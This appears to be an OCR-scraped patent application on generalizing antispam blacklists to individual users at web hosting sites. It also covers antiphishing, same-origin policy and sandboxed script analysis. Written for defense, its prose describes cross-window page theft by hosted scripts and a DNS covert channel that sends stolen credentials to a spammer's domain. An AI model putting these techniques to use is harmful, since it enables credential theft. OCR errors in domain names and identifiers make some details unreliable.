  • Rho For the latter, the response rate to spam is usually less than one percent. For a spammer to make money, Rho needs to be available for as long as possible, because of all these issues. At least several hours, preferably days. Hence, suppose WH gets a reply from the Agg that Rho is spam, and this takes 10 minutes, whereupon WH shuts down Rho. That interval is two orders of magnitude less than having Rho be up for a day or more. If the income that the spammer would get from Rho is roughly proportional to the time that Rho is accessible, up to some maximum time interval, then WH has reduced the income by two orders of magnitude. And this interval of 10 minutes is in turn two orders of magnitude longer than the typical response time of a general search engine.
  • the Agg also has an advantage, this time with respect to ISPs applying antispam methods against incoming messages.
  • a spammer sends out perhaps a million messages, that point to a page Rho at WH.
  • the Agg (or WH if it is not using the Agg) applies some antispam method against Rho. If essentially the same method is used by the ISPs which get the spam messages, then collectively those ISPs have to do a million times the computation done by the Agg (or WH).
  • the Agg Given the easier computational constraints on the Agg, compared to ISPs analyzing messages for spam, the Agg might thus be able to apply more intensive analysis. Including, but not limited to the following:
  • the Agg might follow links in the page, to see if the destinations are in a blacklist. Because of the possible relatively slow response when one goes out on the network via a link, this may be prohibitive when processing messages. But for pages, it may be feasible.
  • a spammer who writes a page might put an image, in which text is written as a bitmap. This evades content filters that operate on explicit text data. Some spam messages already do this, and it can be expected that spam pages might do likewise. Hence, the Agg might apply Optical Character Recognition methods against images in the page, to try and extract text. In general, for messages, this is too intensive and hence slow to be typically used.
  • SOP Security Manager
  • this problem is really two problems. First, being able to identify a web hosting site. Second, knowing a user's scope in the addressing scheme for that site. Hence, if the browser has a list of major web hosting sites, and those publish their f() mappings that define their users' scopes, then the browser could enforce an SOP that is now fine grained down to the level of each user. Here, the browser might either get f() directly from the sites, where its list of sites might be hardwired, or it might use an Agg.
  • Sue's page has a form that the visitor types in some data. Mike might add or change that data, such that when it is submitted to WH's server, an attack (like a buffer overflow or SQL injection) is done.
  • the attack probes whether the WH server guards against these. Plus, if the server hands off the data to code that Sue supplies, the attack might be against that code.
  • Sue has pages that are not publicly viewable.
  • Sue requires a visitor to login with a username and password, using a page with https. Then, assuming the visitor logged in, subsequent pages also use https.
  • the SOP requires that both browser windows use the same protocol.
  • Mike might have his page with an https, but not require any login. Then, his script can then access another window with Sue's private pages.
  • Mike's code might "merely" copy those pages over the network to some address (probably outside wh.com) controlled by Mike.
  • the script might also actively alter the page or information submitted to it, in the manner described above.
  • Mike is attacking Sue or WH. He might also garner information about a visitor, without attacking Sue or WH. For example, if his script can read a form that the visitor fills in on Sue's page, that might have personal information about the visitor. Mike could harvest this, perhaps for identity fraud.
  • Another advantage of our countermeasure is that it can be done automatically, i.e. by default , by the browser. This gets around configuration policies that have to be set manually by someone at the browser. (Quite aside from current browsers not being able to handle the above steps in our method that know about the user scope in a given hosting site.)
  • BankO might publish subdivisions of its web addresses, like "secure” and "market”. These correspond to the users that we have discussed in the bulk of this Invention. Then, the browser, possibly using an Agg, might apply these subdivisions just as it did for users. Here, there would be a list of major banks, and each bank would publish this information about itself. The difference from a Partner List of "2245" is that this new information is about internal entities.
  • the spammer might attempt to write a scripting routine that sets the background color of the document. Possibly, if not probably, where the routine is written in a deliberately complex manner, to defy a trivial programmatic analysis that reveals the output color, where this analysis does not execute the routine.
  • a further refinement is to classify a Dynamic Style as Wrapped, Local or Remote.
  • a Wrapped Dynamic Style has a routine which only uses input values that are in the document.
  • a Local Dynamic Style has a routine which can also use input values that are derived from the machine running the routine, but not from other machines.
  • a Remote Dynamic Style can also use input values derived from other machines on the network.
  • a Local or Remote Dynamic Style might be prohibited by a given browser that runs the given language in which the style's routine is written in.
  • a Local Dynamic Style might use the machine's clock as a seed value for a random number generator, for example.
  • a Remote Dynamic Style might access web pages or Web Services or data files on other machines. As cautioned in "1698", the remote machines that are accessed might or might not be under the control of the document's author. Hence, care should be taken about whether to add those machines to a blacklist or not. However, if a remote machine is already on a blacklist, then this could be used to make an extra style; one that suggests the document is bad.
  • the remote machine is a major web hosting site, which uses the main idea in this Invention of publishing the mapping from files to a user, f(). If the remote access is to a user on a blacklist, where this blacklist entry is done in the manner of Section 6, then we could make an extra style, in the fashion of the previous paragraph, to label the document as bad.
  • the user is not on a blacklist. Then, if from other styles or other analysis of the document, it is classified as bad (spam maybe), this can be used as a style that is attached to the user. To possibly decide if the user is bad.
  • the inference could be that the document author is the same as the user, and has written data into the user's pages, to be used by the document in its scripting routines; perhaps to avoid simple antispam analysis of that document.
  • a slave thread is executing a scripting routine, that turns out to be a Remote Dynamic Style.
  • it should emulate a browser if normally a browser would run the routine and pass information to the remote machine, indicating that the "agent" making the request is a browser. This prevents the remote machine from customizing its reply if it considers the agent to be an antispam entity, as opposed to a normal browser.
  • the thread runs the routine, and the routine calls a function that is normally available to it in a browser, asking for information about the local machine, then the thread should implement that function, and return a typical reply, as though it were a browser. This acts against the routine having logic that tries to determine if it is being run in an antispam thread.
  • Remote Dynamic Styles could be stopped, simply by prohibiting a document, when it is loaded by the browser, to run routines that do remote access. Or, if the document is a web page, to restrict remote access to only that page's domain. But in the long run, this policy may be too crude. As electronic messages and web pages become more complex, there may be an increasing trend to encode programmatic functionality into them. Instead of them being simple static documents. This increased functionality could well involve general access to the network. If so, then spammers can be expected to take advantage by making documents with various Remote Dynamic Styles.
  • a covert channel is a means by which malware running on a machine sends data to another machine, and the transmission is done in a manner to make this non-obvious to simple external inspection.
  • An elementary example involves web bugs or web beacons. This is where a spam message addressed to e.g. larry@somewhere.com has an ⁇ IMG> tag that loads an image from the spammer's domain. The URL in the tag has, to the right of the domain name, an encoding of that email address. So when Larry merely reads the message in his browser, the spammer knows that his email address is valid and active, because the spammer's web server log will show that URL request. In this example, there is no scripting. Each spam message is fully static.
  • a Remote Dynamic Style arises when a network address, either for incoming like the above, or for outgoing, like a clickable link, is made using a script.
  • the script may also or probably encode information derived about the local computer or its user, into the address. This might be done to the left of the spammer's domain name, as above. Or it might be done to the right.
  • the latter is a DNS covert channel. For example, suppose the spammer's domain is spammer.com. If she runs the DNS server for that domain, then any queries from anywhere on the Internet for a subdomain may come to her DNS server. The subdomains might be information found by her spam messages' scripting routines, encoded as valid domain name characters. So, if one of her message's script runs and somehow finds a username ("lucy”) and plaintext password (“duk ⁇ im”), it might write an ⁇ IMG> tag that has
  • her DNS server can decode the username and password, possibly in conjunction with other information that is present in the address (maybe to the right of the domain name).
  • the DNS server can then return the raw address corresponding to spammer.com, regardless of the subdomain values.
  • her script would encode the data so that the encoded characters are valid in a domain name. This step was omitted above for simplicity.
  • the information written into the script might also be about data external to the computer on which the browser is running.
  • Section 13 we discussed how a script loaded from a page at a web hosting site might access data about other pages from that site, which could exist in other windows of the browser. Where, in general, those pages would belong to other users, and might not typically be publicly accessible.
  • the mechanism in this Section lets the spammer encode such information and pass it out over the network to the spammer. Note here that the dynamic address with this information need not necessarily go to the spammer at the web hosting site. In general, she could use another domain to receive the information.
  • a given BME is made from one or more messages (or web pages) that, after canonical steps are done, resolve down to the same hashes.
  • a BME Each writes an address that goes into the same tag in the displayed messages. But we find that the addresses are different, though with the same base domain of the spammer.
  • the different addresses might set a Boolean style suggesting a possible covert channel.
  • our slave process which emulates a browser, might emulate different browsers. It might also emulate system clock times that are different by days. Plus, the emulation might extend to emulating various other aspects of an operating system, like versions of that system, or of different operating systems. If scripts arise that are virus-like, that attempt to subvert an operating system and extract user data, then the slave might ultimately be a virtual operating system. With deliberately variable dummy user data, in instances of the slave running different messages for a BME. Or, the slave might be the same virtual operating system, but with different dummy user data. Plus, the slave might emulate having other windows open, where those might be showing pages (perhaps simulated pages) from a web hosting site.
  • the tag is for an image
  • Another method avoids the use of BMEs. Instead, given a message with dynamic addresses, this might be run several times by the slave. Each time possibly with the slave pretending to be different operating systems or having different data.
  • a Web Service is a computer program that accepts input from one or more computers on the network, and provides output to one or more computers on the network.
  • the input and output messages might be written in XML.
  • the input computers could be different from the output computers.
  • Another important characteristic is that Web Services are meant to be easily aggregated into larger Web Services. A building block approach.
  • V designates a network address of WSH. (It could have several.) Where this address is presumed to uniquely distinguish WSH from other entities on the network. While the data to the right designates an identifier of the owner, where this identifier is presumed to be unique at WSH. The combination of these data uniquely specifies a given user at WSH with respect to any other users at any Web Service Hosting sites.
  • V is purely arbitrary.
  • WSH could apply analysis to Web Services that are to be posted on its site, to test for validity. Indeed, there is a market niche for some such sites to do intensive scrutiny and hence implicitly or explicitly validate that their Services are real. This might appear to obviate any need for our method.
  • WSH User Datagram Protocol
  • WSH User Datagram Protocol
  • Some instances of WSH might insist that as a condition of usage, the source is made available. Which still presents the above analysis problems to WSH. But suppose that WSH does not insist on source code. Given an arbitrary executable, its testing cannot be guaranteed to be exhaustive. The Service might work correctly most of the time. But it could have triggers for malicious activity, and testing might not find these. Plus, if WSH hosts a wide variety of Services, then such testing might have to have a heavy manual component.
  • the network is not restricted to the Internet, but designates any type of electronic network in which Web Services are used. Plus, we have used the term Web Services in conformance with common parlance. But our method applies to programs that behave in this manner, even if the term Web Services is not commonly used to describe them.
  • IM Instant Messaging
  • bots These are software programs that act as "users", interacting with human users via IM. Some bots might be run by the IM provider, and explicitly tell their interlocutors that they are bots. Other bots might be established by human users, who are spammers, and who use these bots to send out many spams to other IM users. An IM provider might prohibit this as a matter of policy. Which means if it gets complaints about a user being a bot spammer, then it would eject the user. But it might also want a technical means of finding a bot, to minimize complaints from users.
  • the provider can apply our BME methods of "0046" to a sample of messages from its users.
  • the users might have an extension to their program that reads and writes IMs, which lets each user find BMEs and pool these in a p2p manner that preserves their privacy. Since the original texts are not shared; only the canonical XML representations.
  • the BMEs might be only for messages received by users in a new "conversation". Since a bot would have some ability to respond to users' replies, and since those replies could be any written text, so too might the bot's responses. So the latter might be low frequency messages, while its first set of messages (probably advertising something) are more likely to map into just a few BMEs (ideally just one).
  • the users can use the above method to find bots, and then complain to the provider and possibly add the bots to their blacklists of unwanted users. The latter might be done if the provider takes too long to remove the bot, or disagrees with the users' assessment that another user is a spam bot.

Abstract

A spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate in blocking all messages linking to that prominent site. We define a small set of major web hosting sites. From each is deduced a mapping from an URL to the user whose page is pointed to by that URL. This mapping might be offered by the website via a Web Service, or it might be manually deduced. The website is not put into a blacklist. But a blacklist entry can be generalized to be the website's domain plus the offending user. This gives a precision blacklisting within a good website's domain. Existing antispam methods that use a blacklist can then apply this generalization with little or no change to those methods. The Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods. The concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and pages that they link to, or that link to it.

Description

SYSTEM AND METHOD FOR GENERALIZING AN ANTISPAM BLACKLIST
Field of the Invention This invention relates generally to information delivery and management in a computer network. More particularly, the invention relates to techniques for automatically classifying electronic communications as bulk versus non-bulk and categorizing the same.
Cross-References to Related Applications
This application claims the benefit of the filing date of U.S. Provisional Application, Number 60/766125, "System and Method for Generalizing an Antispam Blacklist", filed December 31, 2005. That Application is incorporated by reference in its entirety.
Background Art
For the background art, please refers to the References cited: "JavaScript: The Complete Reference" by T Powell and F Schneider, McGraw-Hill 2004, ISBN 0072253576
"Service-Oriented Architecture" by T ErI, Prentice-Hall 2004, ISBN 0131428985 "J2EE Web Services" by R Monson-Haefel, Addison- Wesley 2003, ISBN 0321146182
"Real World Web Services" by W Iverson, O'Reilly 2004, ISBN 059600642X. amazon.com
Summary of the Invention
The foregoing has outlined some of the more pertinent objects and features of the present invention. These objects and features should be construed to be merely illustrative of some of the more prominent features and applications of the invention. Other beneficial results can be achieved by using the disclosed invention in a different manner or changing the invention as will be described. Thus, other objects and a fuller understanding of the invention may be had by referring to the following detailed description of the Preferred Embodiment.
A spammer could try to avoid a blacklist of domains by using a large web hosting site to hold her pages. She sends out spam with links to these pages. An ISP might hesitate in blocking all messages linking to that prominent site. We define a small set of major web hosting sites. From each is deduced a mapping from an URL to the user whose page is pointed to by that URL. This mapping might be offered by the website via a Web Service, or it might be manually deduced. The website is not put into a blacklist. But a blacklist entry can be generalized to be the website's domain plus the offending user. This gives a precision blacklisting within a good website's domain. Existing antispam methods that use a blacklist can then apply this generalization with little or no change to those methods. The Web Service can also offer other information about the user, which can be used by antispam and antiphishing methods.
The concept of web pages at a hosting site belonging to a given user can be applied by a search engine to improve its classification and rankings of those pages and pages that they link to, or that link to it.
Brief Description of the Drawings
There is one drawing Fig.1.
Fig.1 shows a web page host (WH), a central web site (Agg), and a browser. It indicates how WH publishes a mapping f() to the Agg, which then makes it available to a browser, when the browser is visiting WH.
For a more complete understanding of the present invention and the advantages thereof, reference should be made to the following Detailed Description taken in connection with the accompanying drawing.
Detailed Description of the Preferred Embodiment What we claim as new and desire to secure by letters patent is set forth in the following claims.
In this Invention, we generalize what can go into a blacklist that is used against spam. In doing so, we expand the efficacy of the blacklist.
Below, we will refer to the following U.S. Provisional submitted by us, where these concern primarily antispam methods: Number 60320046 ("0046"), "System and Method for the Classification of Electronic Communications", filed March 24, 2003; Number 60481745 ("1745"), "System and Method for the Algorithmic Categorization and Grouping of Electronic Communications, filed December 5, 2003; Number 60481789, "System and Method for the Algorithmic Disposition of Electronic Communications", filed December 14, 2003; Number 60481899, "Systems and Method for Advanced Statistical Categorization of Electronic Communications", filed January 15, 2004; Number 60521014 ("1Ol 4"), "Systems and Method for the Correlations of Electronic Communications", filed February 5, 2004; Number 60521174 ("1174"), "System and Method for Finding and Using Styles in Electronic Communications", filed March 3, 2004; Number 60521622 ("1622"), "System and Method for Using a Domain Cloaking to Correlate the Various Domains Related to Electronic Messages", filed June 7, 2004; Number 60521698 ("1698"), "System and Method Relating to Dynamically Constructed Addresses in Electronic Messages", filed June 20, 2004; Number 60521942 ("1942"), "System and Method to Categorize Electronic Messages by Graphical Analysis", filed July 23, 2004; Number 60522113 ("2113"), "System and Method to Detect Spammer Probe Accounts", filed August 17, 2004; Number 60522244 ("2244"), "System and Method to Rank Electronic Messages", filed September 7, 2004.
We will refer to these collectively as the "Antispam Provisionals".
We described a lightweight means of detecting phishing in electronic messages, or detecting fraudulent web sites in these earlier U.S. Provisionals: Number 60522245 ("2245"), "System and Method to Detect Phishing and Verify Electronic Advertising", filed September 7, 2004; Number 60522458 ("2458"), "System and Method for Enhanced Detection of Phishing", filed October 4, 2004; Number 60552528 ("2528"), "System and Method for Finding Message Bodies in Web-Displayed Messaging", filed October 11, 2004; Number 60552640 ("2640"), "System and Method for Investigating Phishing Websites", filed October 22, 2004; Number 60552644 ("2644"), "System and Method for Detecting Phishing Messages in Sparse Data Communications", filed October 24, 2004; Number 60593114, "System and Method of Blocking Pornographic Websites and Content", filed December 12, 2004; Number 60593115, "System and Method for Attacking Malware in Electronic Messages", filed December 12, 2004; Number 60593186, "System and Method for Making a Validated Search Engine", filed December 18, 2004.
We will refer to these collectively as the "Antiphishing Provisionals".
Below, we will often discuss a "user" who is a customer of a web hosting site, and has web pages at the site. "User" will also designate someone who is running a browser and visiting those pages. Where not explicitly labelled, the different meanings of this word should be clear from the context.
Section
1. Country Domains
2. To the Right of the Domain 3. Extra User Information
4. URL Encoding
5. Redirect
6. Adding User to a Blacklist Entry
7. Aggregation Center 8. Blog Sites 9. Search Engine
10. Clusters
11. Antiphishing
12. Specialized Search Engine
13. Same Origin Policy
14. Dynamic Styles
15. Detection of Possible Covert Channels
16. Future Web Services
17. Instant Messaging Bots
18. Summary
1. Country Domains
In "0046", we explained how to use a blacklist against electronic messages; especially against links in the bodies. A key step there was the reduction of an electronic address, like a URL, or, equivalently, the domain withing such an address, to what we termed a
"base domain". So for example, an address like http://ape.bear.com/bin/testO would give a base domain ofbear.com.
In another example, a domain like mike.joe.toml55.net.au would give a base domain of toml 55.net.au. It can be seen that a base domain is a reduction in the number of fields in the domain to some minimal set of fields on the right hand side. Sometimes this is two, as in bear.com, sometimes it is three, as in tom.155.net.au.
In determining the number of fields, a key idea is the minimum number of fields in a domain that can be owned. So in the dot com Top Level Domain [TLD], this is two. But a problem arises with some country TLDs. A country like China, with TLD = en, has subdomains com, edu, gov, mil, net and org. So Chinese domains with those subdomains would reduce to 3 fields in a base domain. But the organization that controls the Chinese TLD also sells domains that come directly off en. Like examplel l l.cn. Hence, for countries that permit direct ownership off their TLDs, the mapping to a base domain becomes thus:
Find the set S of names of {com, edu, gov, mil, net, org} of fields that are directly to the left of the country TLD. Not all of these might exist for a given country. Also, these field names might be different from the above. For example, Japan's S = {co, ac, go, ne, or}. In practice, most countries that have a non-empty S use the naming conventions from one of these two sets.
There is another criterion for an entry to be in S. Let xx be an [imaginary] country TLD. Suppose com.xx exists. Does the registrar who controls xx routinely sell or otherwise allocate ownership of subdomains of com.xx? If so, then com belongs in S for xx. This step is to avoid the slight possibility that com.xx does not correspond to dot com, but is instead just a "regular" domain whose subdomains are not sold to others.
If S is empty, then all base domains for that country have two fields.
Suppose S is not empty. Let D be a domain that we are reducing to a base domain. Assume D ends in the same country TLD that S is associated with. If the second field from the right in D is in S, then the base domain will have 3 fields, and we reduce D accordingly. Otherwise, D hangs directly off the country TLD, so its base domain is 2 fields, and we reduce it to this subset.
2. To the Right of the Domain
For a URL, we show how we can, in some key cases, reduce it not just to a base domain, but to a base domain plus information to the right of it. The reason for doing this is the following. As blacklists have become widely used against body links in messages, spammers have sought to evade this. One method is for a spammer to use a website that is not its own domain. Instead, the spammer goes to a prominent web hosting site, that hosts on its own domain. The idea is that an ISP might be reluctant to blacklist that web hosting site, because of its importance. Since, if it does so, its members who get messages from non-spammers using that website, with links to it, might be adversely affected.
We present a solution. Let us be an ISP or other message provider that seeks to detect and block spam. We draw up a list of prominent web hosting sites, that host on their own domains. Call this H. The size of H is a key advantage. While there might be a degree of subjectivity in adding a site to H, we can restrict H's size to some relatively small number. Probably less than 100. This is crucial, because a typical URL lets the information in its path, which is to the right of the domain, be interpreted in essentially an arbitrary manner by the web server at that domain. Let G be that path in the URL.
If we encounter a message with a link having a base domain not in H, then we treat it as in our Antispam Provisionals.
Now consider a message with an URL having a base domain in H. We want to map from G to its associated user, U, denoted as f(G)=U; Figure 1 is an example of one possible configuration. Where f depends on a given domain in H. In general, this is not simply the identity transformation, f(G)=G. Because a user at the website might be able to specify an URL that points to an arbitrary file or directory owned by that user. This lets her have degrees of freedom to generate numerous unique URLs. So we seek to do an analogous operation to mapping from a domain to a base domain, to remove these degrees of freedom.
There are several ways f() could be found. Firstly, by manually reviewing the website's documentation. This should often suffice. The website has an existing incentive to make the naming convention for its customers' URLs to be as simple for them to understand as possible. (Quite aside from the antispam context of this Invention.) Consider a website's customer. She writes various web pages, possibly with a directory structure. The writing of these might be aided by various editing tools provided by the website. Ultimately, she writes these pages so that they can be accessible on the web. So the address of the web page, even if it is autogenerated by the website, is typically straightforward to understand. Because, at the very least, there could be a debug cycle, where such an address, which is now a link in a message or external web page, breaks, or refers to a wrong file. So she has to go back to her web pages and resolve this.
Hence, a logical and simple example of G might be symbolically written as username + /dir 1/dir 2/.../dir n/fileO where dir 1, dir 2, ..., dir n refer to a directory structure written by the customer, in which her file, here shown as fileO, exists. (The above could also have arguments to the right of fileO.) For the websites in H, it can be expected that several, if not most, use an f() that is recognizably equivalent to the above.
A second way to find f() is for the website to publish it as a Web Service. Where the latter is usually written in XML. f() might contain instructions written in a computer language like C or C++, or even in a language like XSLT. So that we could access this Web Service, get f() and run it easily on our machines.
3. Extra User Information
An important generalization of f() is where it returns not just a single string representing the user, but also other data. These include, but are not limited to the following items:
a. A code whose values might take on these meanings - FREE = the user has a free account at the web host.
PAID = the user has a paid account.
VERIFIED = the user has a paid account and the user's identity has been verified by some means.
b. Complaints about the user. These might have been submitted to the web host by ISPs, or possibly by individual visitors to the user's pages. This information might be furnished as an absolute number of complaints.
c. When the user account was made. Typically, a spammer might open a free account that will be in existence for only a short time. Until she sends out many spams, and the web host gets enough complaints to shut down the account. So empirically, the older the account, the less chance of it being spam.
d. The number of pages written by the user. The greater the number, then perhaps the less chance that the user is a spammer. Typically, if a spammer's account will only be in existence for a short time, she might not invest much effort in maintaining many pages. Plus, some spammers just have one page, which is a redirect to another domain. (See Section 5 for a fuller discussion about redirects.) A spammer might try to get around this being used as a test, by uploading many pages. In and of itself, making the spammer do this extra effort is desirable from an antispam viewpoint.
e. Whether the user has pages with links to domains in a blacklist used by the web host. If so, the host might permit such pages to be written, but here it could provide a warning that these pages exist.
f. Whether the user has pages with links to a list of companies that are likely to be phishing targets. This list might have domains of banks and online auction sites. Also, it could have domains of companies that issue electronic seals, or do website validation. It has been noticed that phishing messages and pharming web pages might have actual links to the companies they are impersonating. Plus occasionally clickable images that are electronic seals, and which link to the companies issuing those seals.
g. Whether, for the previous two items, any page with links computes one or more addresses dynamically, instead of using simple static addresses. This applies the idea in "1698", that a spammer could use this to try to avoid detection by a blacklist.
h. If the user has pages that are accessed by a secure protocol like https. In practice, most pages at major web hosting sites do not use this. Its presence might suggest a possible phishing scenario where a page is pretending to be a secure login page at some bank. (Some web hosts might simply forbid users to require https to their pages.)
i. If the user has pages with our Notphish tag of "2458". This might be due to a valid usage. Or it might be due to a phisher writing invalid Notphish tags.
j. If the user has pages that involve the dynamic writing of various data, separate from the above discussion about dynamic addressing. For example, there might be the dynamic writing of the Notphish tag, to avoid the detection described in the previous item.
k. If the user has pages that offer downloading of files. There could be many valid reasons. But it could also possibly be an attempt at distributing malware.
1. When the user connects to the web host, is this from an address or close to an address from which previous users have done so, where those users later had their accounts closed for violating the host's Terms of Service?
m. The amounts of incoming and outgoing bandwidth consumed by people accessing the user's files in some (recent) time period. In addition or instead of this, the relative rankings of a user in incoming and outgoing consumption, across the website's users. The largest consumers might be interesting, for this is a measure of the popularity of a user.
n. For the page G in f(G), when was it last changed? Analogous to item (c). But instead of asking about the entire account, here it is just about G. Typically, the older the G, the more benign it might be. Presumably, the longer it has been accessible to the network and the fact that it is still accessible means the greater the chance that there have been fewer (valid) complaints about it to the host. A search engine might have an earlier spidering of G3 so it can get an approximate value for this quantity. But that depends on its spidering frequency for G. Whereas the web host can readily have the real date available.
o. For the page G, when was it first accessed, after the most recent change? Different from the previous item, because imagine that a spammer could write a page. Even though it is accessible, that does not necessarily mean anyone might visit it. Until perhaps the spammer sends out spam with links to G. As with the previous item, the older this date, presumably the more benign the page. Now if the host publishes this item about G, the spammer might try to game it by simply accessing the page, after she has changed it. To mitigate this, the host might exclude network neighborhoods around the most recent network addresses that the user came in from.
p. For the page G, any "votes" about it that the host has received. Where a negative vote is a complaint, and a positive vote is an affirmation by someone that G is okay. This item is analogous to (b), but it is just about G.
For items (e-g), when we say "links", these can be the usual outgoing links, or incoming links (like loading an image). Also, we include the case of the destination that is used when an HTML "submit" button (or its functional equivalent in any other hypertext language) is pressed. This action is usually done when the user has typed information into a form on that page, and then wants to upload it. Some of the above information could be found by spidering a user's pages. Like the number of pages, for instance. But having the information readily available is more efficient in terms of network traffic and computation. Both at the ISP and at the web host. Because if the ISP has to do a full spidering of the pages, then this also involves more effect by the web host's server.
The ISP can use the above information to help classify the messages pointing to the user's pages. Our methods from the Antispam Provisionals involve the finding of a Bulk Message Envelope (BME). These objectively can find the BMEs with the most messages. There remains the question of whether such a BME, though it has many messages, is to be considered "good" bulk or "bad" bulk. (Good bulk might be newsletters that recipients subscribe to.)
The above information can be used as extra "styles" ["1174"] or heuristics to help in this determination. For example, if the user has a verified account, then the messages linking to her pages might be more likely to be good bulk than bad, compared to a user just having a paid or free acount, other factors being equal.
It should be noted that currently, the above information is not released by most web hosts, if any. There is an analogy with email addresses. The large free email providers Hotmail and Yahoo also offer paid accounts. But given an arbitrary email address at either domain, there is no way for an outsider to tell if this is a free or paid account.
Let WH be a web host, with website wh.com. Why should it provide the above information? If it is serious about not tolerating spam, then it might be amenable. The above lets message providers give it feedback with assessments of its users. For example, if an ISP made a decision that a given user at WH is a spammer, it might communicate this to WH. To optimize bandwidth, the ISP might batch these results. Then it could periodically upload to WH a list of WH' s users, as seen in the ISP's incoming messages. Next to each username could be information like the total number of messages seen with links to that user, and the number of these messages that the ISP considered to the spam. Where implicitly, if there is a difference between these two numbers, then those other messages were not considered to be spam.
This is cooperative behavior by WH and an ISP. Both sides benefit, by closing an information loop. For example, when WH has a user who puts up her web pages, in general, WH has no idea how that user attracts visitors to her pages. Certainly, WH's web server has various statistics about where and when the user's visitors come from. But here, the "where" is just the network address of the visitors' browsers. Now suppose WH knows that for its user Zoltan, there were 20 000 emails received by an ISP, with links to Zoltan's pages. Note that this does not mean or require that there were 20 000 clickthroughs to WH. So even temporarily leaving aside the proportion of those 20 000 messages that the ISP considered to be spam, simply knowing that there were these many messages can be useful to WH. For example, WH might have some threshold value, such that a user with associated messages above that threshold will have his pages come under manual scrutiny.
Of course, if WH also uses the ISP data about what fraction of messages pointing to Zoltan are considered spam, then it has more information to act on.
It might be objected that WH telling the ISP about the complaints received by it about Zoltan's pages could be an infringement of Zoltan's privacy. But the complaints might be regarded as negative votes on those pages. Akin to Amazon Corp.'s website, where you can read a review of a book, and see how many positive or negative votes that review got. The comparison is especially appropriate since the reviews are on publicly accessible pages, and typically so too are most of the pages at WH. Plus, WH could in general modify its Terms of Service with its users, to expressly permit the above furnishing of information to third parties like ISPs. (This modification might need some advance notice in it, so that existing users have a reasonable amount of time to move if they object.) Of course and ironically, this furnishing of information to others has taken on a bad taint, because some spammers have used such phrases to claim permission for wholesale reselling of their mailing lists to other spammers. But in our method, a major, if not exclusive, intent of this action is to fight spam at both web hosts and ISPs.
WH might also offer on its web pages or via a Web Service, a means of searching its users, using constraints on the above variables as search criteria. For example, it could return links to those users whose free or paid accounts have existed for more than 60 days,
In turn, this leads to the possibility of a third party web site, that aggregates users from different web hosting sites. Analogous to how news feeds can be aggregrated using RSS. Currently, any such user aggregation has to be done in an ad hoc fashion. But the use of the above Web Services can lead to an easier programmatic approach.
A merit of our method is that it attacks a technique by a spammer who opens an account at WH and writes pages, and who then injects spam into the network by various means, whose only connection to WH are in the enclosed links. The spammer takes advantage of the fact that WH and the ISP currently each only sees its own situation.
4. URL Encoding
Above, we mentioned how WH could have a Web Service that tells whether a user has a free, paid or verified account. Instead, or in addition, WH could also encode this in the URLs of a user's pages. So Zoltan has a free account, his base URL might be http://wh.com/free/Zoltan, while if Mary has a paid account, her base URL might be http://wh.com/paid/Mary. In doing this, it could reduce the bandwidth requirements on WH's Web Service, since the latter now need not furnish such information. But another advantage of this is that it is analogous to our Notphish tag in "2528", if several web hosts use an agreed upon encoding, whose meaning can in turn be used at ISPs. The above URLs obey all the Internet rules for the valid format of an URL. Thus a user clicking on one of these only needs the standard behavior of a browser and web server, to access the page that is linked to. This is just like how our Notphish tag is compatible with browsers, which will merely ignore it when doing the visual layout of a page.
The potential advantages of the URL encoding go further. If WH is unable or unwilling, for whatever reason, to run a Web Service, then it could do this encoding. On the ISP side, it might permit a faster determination of the above style, directly from the URL, using the reasoning in the next paragraph.
Suppose Zoltan is a spammer, with his base URL given above. He cannot change this URL, even if he would prefer a "paid" or "verified" in it. Because in general, there will be no pages at that URL, if he does so. Which means no clickthrough is possible in that link in his messages. Or even, if by coincidence, there is a j http://wh.com/paid/Zoltan, this is to a different person's pages, and not to whatever "our" Zoltan is selling.
Of course, the choice here of {free, paid, verified} as the strings in the encoding uses English words. Our method applies if words in other languages are used, with the equivalent intent. Or if a numeric code was instead used. Or if there was some other change made in the URL with the same intent. For the latter, imagine perhaps WH offering the default HTTP port 80 for its free users' links, and another port for its paid users and another port for its verified users.
To WH, another possibly useful feature of this explicit labelling of a user's status is that it might be an incentive for its users to migrate from free accounts to paid accounts. The current situation where outsiders cannot tell if Zoltan is a free or paying user might be interpreted as Zoltan getting a free ride, vis-a-vis the paying users.
It might be objected that suppose a user opens a free account and writes some pages. The URLs to these will have a path prefix of "free/". Now she upgrades to a paid account. She now has new URLs with a prefix of "paid/". But what if when the account was free, she had promulgated the earlier URLs to others? For some period of time after the upgrade, WH can have an internal redirect from the old URLs to the new URLs. This can be done automatically by simple coding, when a user upgrades.
Whether or not WH writes user information into the URLs, it can also publish a set of what we term "base labels". These labels mean that if a URL has a path that begins with one of these base labels, then it refers to a page published directly by WH itself, as opposed to its users. Imagine for example that the base labels are {info, home, help}. These demarcate directories of pages that are not written by the users. The base labels might be published as a Web Service and in a web page. It lets third parties programmatically distinguish between WH and its users.
The presence of the labels for a user's status, in the URL also lets these be used in antispam measures, that operate on messages containing the URLs. The measures might be performed at the message provider that receives the messages, or in the recipient's computer, as a client side filtering of spam. In either case, the user status in the URL can be used as an extra heuristic in assessing the message containing the URL. The recipient might even have a policy that such a message, that points to a good web hosting site, might go into her bulk folder if it is from a free user, while if it is from a paid or verified user, it might go into her inbox. Where here, both cases might be overridden by other filtering steps, like if the sender is in her whitelist, then the message goes into her inbox, even if it points to a free user's URL. Or if the message also has a link with a domain in a blacklist, then the message might go into the bulk folder, even if another link points to a verified user's URL at WH. Clearly, the interplay between the filtering rules might be complex. But the point is that knowledge of the user status gives us another handle on fighting spam.
The antispam steps in the previous paragraph might also be possible even if WH does not write the status of the user into the URL. If WH does publish a Web Service with this information, then a message provider can ask it for that information, and do the other steps suggested in the paragraph. This might also be possible at the recipient's computer, if her mail reading software accesses WH's Web Service.
5. Redirect
Given knowledge about a user associated with a page, styles can be defined if the page has a redirect. The redirect might be done via a META refresh tag. Or by other means such as JavaScript on the browser (client) side, or by server side actions, like a CGI script or Java that runs on the server. The ISP or other external party could load the page and detect the META refresh tag or JavaScript that would run in a browser. To detect server side actions, the ISP might choose to simulate a browser, to find the destination that the actions redirect to. Some web hosting sites might prevent their users from using some of the above mechanisms. For example, WH might restrict its users to writing HTML.
While the redirect mechanisms might vary, and new ones might emerge over time, the intent here is to detect a redirection, and not how that is achieved. The detection is not expected to be difficult, though below we discuss how the destination might possibly be obscured.
